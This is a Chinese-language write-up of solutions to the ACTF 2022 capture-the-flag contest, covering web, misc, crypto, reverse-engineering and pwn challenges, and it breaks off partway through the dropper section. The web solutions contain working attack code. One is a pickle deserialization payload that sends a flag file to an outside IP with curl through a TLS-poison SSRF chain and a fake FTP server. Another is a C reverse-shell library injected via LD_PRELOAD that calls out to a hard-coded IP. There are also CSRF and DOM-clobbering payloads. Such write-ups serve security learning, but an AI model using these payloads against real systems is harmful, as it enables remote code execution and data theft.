2022 ACTF-wp
- Web
-
- ToLeSion
- beWhatYouWannaBe
- gogogo
- poorui
- Misc
-
- Signin
- 麻将
- safer-telegram-bot-1
- Crypto
-
- impossible RSA
- RSA LEAK
- Re
-
- dropper
- Pwn
-
- 2048
- Tree
- Tip
Web
ToLeSion
分析源码可以发现只剩下了ftps和http协议又没有crlf 那就只能是ftps打ssrf了 首先要准备好搭建 https://github.com/ZeddYu/TLS-poison 按readme安装就行 需要注意的是,这个工具是通过取来的redis里名为payload键值对来传递payload的(需要改Main.rs的代码 把redis://redis本地的redis。 
在环境准备之后,你需要证书创建转发器 将11211端口数据转发到2048端口。
target/debug/custom-tls -p 11211 --verbose --certs /etc/nginx/ssl/ctf.edisec.net.pem --key /etc/nginx/ssl/ctf.edisec.net.key forward 2048 打开转发后,在2048端口开始evil ftp 起evilftp就可以把redis中的payload转发到任何端口。 这个问题的过程是 pycurl→ftps→tls→ftp→memcache 因为使用memcache存储session如果有反序列化,首先是整个反序列化poc。
import pickle import os import memcache mc = memcache.Client(["127.0.0.1:11202"],debug=True) class A(object): def __reduce__(self): cmd = "curl -F a=$(/readflag) 36.255.221.156:9999" #命令 return (os.system,(cmd,)) a = A() pickle_a = pickle.dumps(a)#序列化 print(pickle_a,len(pickle_a)) mc.set("actfSession:suanve",pickle_a) mc.set("actfSession:suanve",'') # pickle.loads(pickle_a) #反序列化触发代码执行 我们把set actfSession:suanve 0 0 80 \r\n poc\r\n存到redis里 然后将数据转发到11200。
!/usr/in/env python3
import socketserver, threading,sys
import redis
r = redis.Redis(host='127.0.0.1', port=16379, db=0)
cmd = b"\x80\x04\x95B\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c'curl -F a=$(/readflag) 36.255.221.156:9999\x94\x85\x94R\x94."
cmd = b'\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c*curl -F a=$(/readflag) 36.255.221.156:9999\x94\x85\x94R\x94.'
print(len(cmd))
payload = b"\r\nset "+ b"actfSession:suanve1"+ b" 0 0 80 \r\n"+cmd+b'\r\n'
print('payload len: ', len(payload), file=sys.stderr)
#assert len(payload) <= 32
r.set('payload', payload)
class MyTCPHandler(socketserver.StreamRequestHandler):
def handle(self):
print('[+] connected', self.request, file=sys.stderr)
self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr,flush=True)
self.request.sendall(b'230 Login successful.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 yolo\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 yolo\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'257 "/" is the current directory\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,192)\r\n')
#self.request.sendall(b'227 Entering Passive Mode (120,26,59,137,43,194)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
#self.request.sendall(b'227 Entering Passive Mode (120,26,59,137,43,194)\r\n')
self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,192)\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'200 Switching to Binary mode.\r\n')
self.request.sendall(b'213 7\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')
self.data = self.rfile.readline().strip().decode()
print(self.data, file=sys.stderr)
# 226 Transfer complete.
self.request.sendall(b'250 Requested file action okay, completed.')
exit()
def ftp_worker():
with socketserver.TCPServer(('0.0.0.0', 2048), MyTCPHandler) as server:
while True:
server.handle_request()
threading.Thread(target=ftp_worker).start()
先打了本地nc(这里是少了一个\r\n的图 然后就是先请求11211端口触发ssrf
curl "[http://123.60.131.135:10023/?url=ftps://ctf.edisec.net:11211/1](http://123.60.131.135:10023/?url=ftps://ctf.edisec.net:11211/1)"
然后带cookie访问
curl --cookie "session=suanve1" "[http://123.60.131.135:10023/?url=1](http://123.60.131.135:10023/?url=1)"
触发反序列化 ACTF{GO0d_jo6_y0u_Ar3_G0od_At_Tl3_p0i30n}
beWhatYouWannaBe
root@10-7-100-194:/var/www/html# while true;do node 1.js;done
不停的把当前时间戳转成csrf的token写成html
root@10-7-100-194:/var/www/html# cat 1.js
const crypto = require('crypto')
const fs = require('fs')
var sha256 = crypto.createHash('sha256')
const content = sha256.update(Math.sin(Math.floor(Date.now() / 1000)).toString()).digest('hex')
const s = `<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form id="a" action="http://localhost:8000/beAdmin" method="POST"> <input type="hidden" name="username" value="su" /> <input type="hidden" name="csrftoken" value="`+content+`" /> <input type="submit" value="Submit request" /> </form> </body> <script> a.submit(); </script> </html> `
fs.writeFile('4.html', s, err => {
if (err) {
console.error(err)
return
}
})
用burp不停的爆破 提升当前用户为管理员 可得到前一段flagACTF{3asy_csrf_a 剩下一层就是构造一个多层的关系
<iframe
name="fff"
srcdoc="<iframe srcdoc='<input id=aaa name=ggg value=this_is_what_i_want><input id=aaa>' name=lll>"
></iframe>
发送即可 ACTF{3asy_csrf_and_bypass_stup1d_tok3n_g3n3rator_and_use_d0m_clobberring!!!}
gogogo
https://tttang.com/archive/1399/
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
char *server_ip="36.255.221.156";
uint32_t server_port=1234;
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void)
{
//socket initialize
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {
0};
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(server_port);
attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
//connect to the server
if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
exit(0);
//dup the socket to stdin, stdout and stderr
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
//execute /bin/sh to get a shell
execve("/bin/bash", 0, 0);
}
gcc -s hack.c -fPIC -shared -o hack[.so](http://1.so/)
curl -x [http://127.0.0.1:8080](http://127.0.0.1:8080/) -X POST [http://127.0.0.1:10218/cgi-bin/hello](http://127.0.0.1:10218/cgi-bin/hello) -F "LD_PRELOAD=/proc/self/fd/7" -F file='@hack.so'
抓包改size ACTF{s1mple_3nv_1nj3ct1on_and_w1sh_y0u_hav3_a_g00d_tim3_1n_ACTF2022}
poorui
登陆以后直接发getflag ACTF{s0rry_for_4he_po0r_front3nd_ui_😃_4FB89F0AAD0A}
Misc
Signin
几种压缩方式来回压缩,循环解压。 exp
import zstandard
import pathlib
import gzip
def decompress_lzma_to_folder(input_file):
with open(outputfile,'wb') as f:
print("lzma:"+outputfile)
f.write(lzma.open(input_file).read())
def decompress_zstandard_to_folder(input_file):
input_file = pathlib.Path(input_file)
with open(input_file, 'rb') as compressed:
decomp = zstandard.ZstdDecompressor()
print("zst:"+outputfile)
with open(outputfile, 'wb') as destination:
decomp.copy_stream(compressed, destination)
def decompress_gzip_to_folder(input_file):
with gzip.open(input_file,'rb') as f_in:
with open(outputfile,'wb') as f:
print("lzma:"+outputfile)
f.write(f_in.read())
def decompress_bzip_to_folder(input_file):
with open(input_file,'rb') as f_in:
with open(outputfile,'wb') as f:
print("bzip:"+outputfile)
f.write(bz2.decompress(f_in.read()))
count = 1
extra_outputfile = "./flag" + str(count)
outputfile = "./flag" + str(count+1)
for i in range(1000):
with open(extra_outputfile,'rb') as f:
data = f.read()
print(data[0:4])
if data[0:4] == b"(\xb5/\xfd" :
decompress_zstandard_to_folder(extra_outputfile)
if data[0:4] == b'\x1f\x8b\x08\x08':
decompress_gzip_to_folder(extra_outputfile)
if data[0:4] == b'\xfd7zX' or data[0:4] == b']\x00\x00\x80':
decompress_lzma_to_folder(extra_outputfile)
if data[0:4] == b'BZh9':
decompress_bzip_to_folder(extra_outputfile)
extra_outputfile = outputfile
print("extra:" + extra_outputfile)
count = count +1
outputfile = "./flag" + str(count+1)
print("now:"+outputfile)
麻将
webpack
safer-telegram-bot-1
两个login,中间时间掐一下,就可以,这里也涉及js里面的伪随机数,其实就是一个固定序列的数。
Crypto
impossible RSA
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
import gmpy2
e = 65537
with open("public.pem", "rb") as file:
rsa=RSA.import_key(file.read())
n=rsa.n
with open("flag", "rb") as file:
c=bytes_to_long(file.read())
a=e*n
for k in range(1,e):
delta=1+4*a*k
r=gmpy2.iroot(delta,2)
if r[1]:
p=(r[0]-1)//(2*k)
q=n//p
d=inverse(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,n)))
RSA LEAK
中间相遇攻击解出rp和rq
e=0x10001
n=122146249659110799196678177080657779971
c=90846368443479079691227824315092288065
d={
}
for i in range(2**25):
if not i%100000:
print(i)
d[pow(i,e,n)]=i
aaa=(m-0xdeadbeef)%n
g=d.items()
for i,v in g:
if not v%100000:
print(v)
kk=(aaa-i)%n
if kk in d.keys():
print(i,kk)
# 113757846063928088730867081492028050942 99234772038661790157038919899986088535
$ab=\sqrt{
n},n=(a^4+r_p)(b^4+r_q)$解出a,b
import gmpy2
rp,rq=405771,11974933
n = 3183573836769699313763043722513486503160533089470716348487649113450828830224151824106050562868640291712433283679799855890306945562430572137128269318944453041825476154913676849658599642113896525291798525533722805116041675462675732995881671359593602584751304602244415149859346875340361740775463623467503186824385780851920136368593725535779854726168687179051303851797111239451264183276544616736820298054063232641359775128753071340474714720534858295660426278356630743758247422916519687362426114443660989774519751234591819547129288719863041972824405872212208118093577184659446552017086531002340663509215501866212294702743
ab=int(gmpy2.iroot(n,4)[0])
a_4,b_4=var('a_4 b_4')
r=solve([a_4*b_4-ab^4,(a_4+rp)*(b_4+rq)-n],[a_4,b_4])[1]
print(r)
# [a_4 == 70102828721558534948345339875672972694466981761923685698221464095350842567073878119031031001553580576396374042398681177813432211192009435021654721839600881033401700453496031215200878726773965083072958368869100670943702515680428810181896567941226764174676649752402094845184768854288495448882912408034163036416, b_4 == 45412915496099851216618901310768894310584095399914513550903694354875119254073464201324397609041971419465018896956786021330038801780511592201795793118669826074313642092350150811064582048553811833181582093091649655549475320526152216592300774144665572210409104781712067015180667377938234003697976545066894141456]
from Crypto.Util.number import *
n = 3183573836769699313763043722513486503160533089470716348487649113450828830224151824106050562868640291712433283679799855890306945562430572137128269318944453041825476154913676849658599642113896525291798525533722805116041675462675732995881671359593602584751304602244415149859346875340361740775463623467503186824385780851920136368593725535779854726168687179051303851797111239451264183276544616736820298054063232641359775128753071340474714720534858295660426278356630743758247422916519687362426114443660989774519751234591819547129288719863041972824405872212208118093577184659446552017086531002340663509215501866212294702743
e = 65537
c = 48433948078708266558408900822131846839473472350405274958254566291017137879542806238459456400958349315245447486509633749276746053786868315163583443030289607980449076267295483248068122553237802668045588106193692102901936355277693449867608379899254200590252441986645643511838233803828204450622023993363140246583650322952060860867801081687288233255776380790653361695125971596448862744165007007840033270102756536056501059098523990991260352123691349393725158028931174218091973919457078350257978338294099849690514328273829474324145569140386584429042884336459789499705672633475010234403132893629856284982320249119974872840
a_4=70102828721558534948345339875672972694466981761923685698221464095350842567073878119031031001553580576396374042398681177813432211192009435021654721839600881033401700453496031215200878726773965083072958368869100670943702515680428810181896567941226764174676649752402094845184768854288495448882912408034163036416
p=a_4+rp
q=n//p
print(long_to_bytes(pow(c,inverse(e,(p-1)*(q-1)),n)))
Re
dropper
加了upx壳,把壳手动脱去,并调试到main函数开始部分,对一些函数进行重新命名。 首先是从程序中加载资源,再对资源解密,看到解密资源的地方:异或0x73 调试发现解密出的资源是一个pe文件,用idapython提取出来:
from ida_bytes import *
addr = 0x222D7798EB0
len = 0x0000000000025400
f = open("ans.exe", "wb")
for i in range(len):
f.write(bytes([get_byte(addr)]))
addr += 1
f.close()
print('3'*100)
接着主程序后面就是创建一个进程,并把刚刚解密出的pe文件手动装载进行内存,然后恢复执行。 因此我们下面关键就是要分析提取出的pe文件。 先是一个base64编码,接着是很多重复的函数不断调用,分析出主要都是解密数据、一些赋值及大数加减乘除的运算,其中关键是程序使用了一个int a[500]的数组来实现这个大数的存储及运算。 如下,是解密字符串数据后进行逆序的4个一组切割字符串并转换为int,也是还原出一个大数的操作。 以下即是解密处理后的密文数组 因为直接调试出现除0异常,这里采用附加调试,调试到关键加密函数提取出运算数据。
[[0x000024AC, 0x00000116, 0x000004F4, 0x00000B64, 0x00001DC3, 0x00001B4A, 0x000001B2, 0x00001FCE, 0x00000E81, 0x000025AB, 0x0000015B, 0x0000252D, 0x000002AC, 0x00000F77, 0x000022F5, 0x000019E3, 0x00001C53, 0x00000B66, 0x000011BC, 0x0000193A],
[0x00000DC6, 0x00000854, 0x000015F5, 0x00002567, 0x000008FA, 0x00000E20, 0x00000807, 0x00001007, 0x000018CC, 0x00001E84, 0x00001F11, 0x000013D4, 0x0000076A, 0x00001461, 0x00000B0F, 0x00001F70, 0x00001B3D, 0x00001008, 0x00000D52, 0x0000049A],
[0x00001A89, 0x00000E42, 0x000000FA, 0x0000100D, 0x000014DD, 0x00001BFC, 0x000026DB, 0x00001AC2, 0x00001CA0, 0x000005ED, 0x00000834, 0x000016BF, 0x00000704, 0x00001FAD, 0x000025FD, 0x00001142, 0x00001EEE, 0x00001E60, 0x00000353, 0x000015A8],
[0x00000E17, 0x00000706, 0x00000C1F, 0x00000169, 0x00002248, 0x000007FD, 0x00001768, 0x00001F54, 0x00001574, 0x00002458, 0x00000374, 0x00001D6B, 0x00000918, 0x00000ECF, 0x0000211D, 0x00001D96, 0x00001BEB, 0x00001703, 0x00001B87, 0x000006FA],
[0x00000AE3, 0x0000069F, 0x000001EF, 0x00001C15, 0x00001378, 0x000020D1, 0x0000211D, 0x00002275, 0x000005F4, 0x00002475, 0x00000D13, 0x000008EF, 0x00000E10, 0x000006D4, 0x0000215A, 0x000004D6, 0x0000202F, 0x00001B99, 0x00001C86, 0x000002F1],
[0x00000680, 0x000000D4, 0x00000677, 0x00001E21, 0x0000220D, 0x00000933, 0x00000973, 0x00001947, 0x00000D61, 0x0000247F, 0x00001D21, 0x00001FA2, 0x00001606, 0x000007B0, 0x00001829, 0x000016C0, 0x000026C9, 0x0000248C, 0x00000C9A, 0x00001F8F],
[0x0000257F, 0x00000359, 0x00001831, 0x000021B7, 0x00000BA8, 0x00000FC5, 0x00000BA4, 0x000024E2, 0x00001241, 0x00000D53, 0x00000C82, 0x00001240, 0x00002241, 0x00001156, 0x0000116A, 0x000005F3, 0x000022D5, 0x000008DA, 0x000014A3, 0x0000059E],
[0x00001675, 0x00000AA9, 0x00000D8B, 0x00000D31, 0x00001722, 0x000006C8, 0x0000151B, 0x000017D8, 0x00001FEF, 0x00001624, 0x00002307, 0x00000CB9, 0x0000053C, 0x00000230, 0x00001EAA, 0x00001FD1, 0x00000FAD, 0x00001E30, 0x00002345, 0x00001583],
[0x000001D1, 0x0000056E, 0x00000AA3, 0x0000223C, 0x000009A4, 0x000006C9, 0x00000112, 0x00001977, 0x00002512, 0x00000B60, 0x0000081A, 0x00000F06, 0x00001329, 0x000011AA, 0x00002404, 0x00000E57, 0x0000011E, 0x000011DC, 0x00002474, 0x00001BC7],
[0x000022BE, 0x00001F17, 0x00000588, 0x00001B80, 0x00001479, 0x000016EF, 0x000008CA, 0x00000D6E, 0x0000138F, 0x00001054, 0x000021FA, 0x00000102, 0x000013A6, 0x00000195, 0x000002D1, 0x00002594, 0x00001369, 0x00002534, 0x000015C5, 0x0000168A]]
运算过程 解密
import base64
enc = [0x000020F1, 0x00001DA9, 0x00000156, 0x00000B37, 0x000007C0,<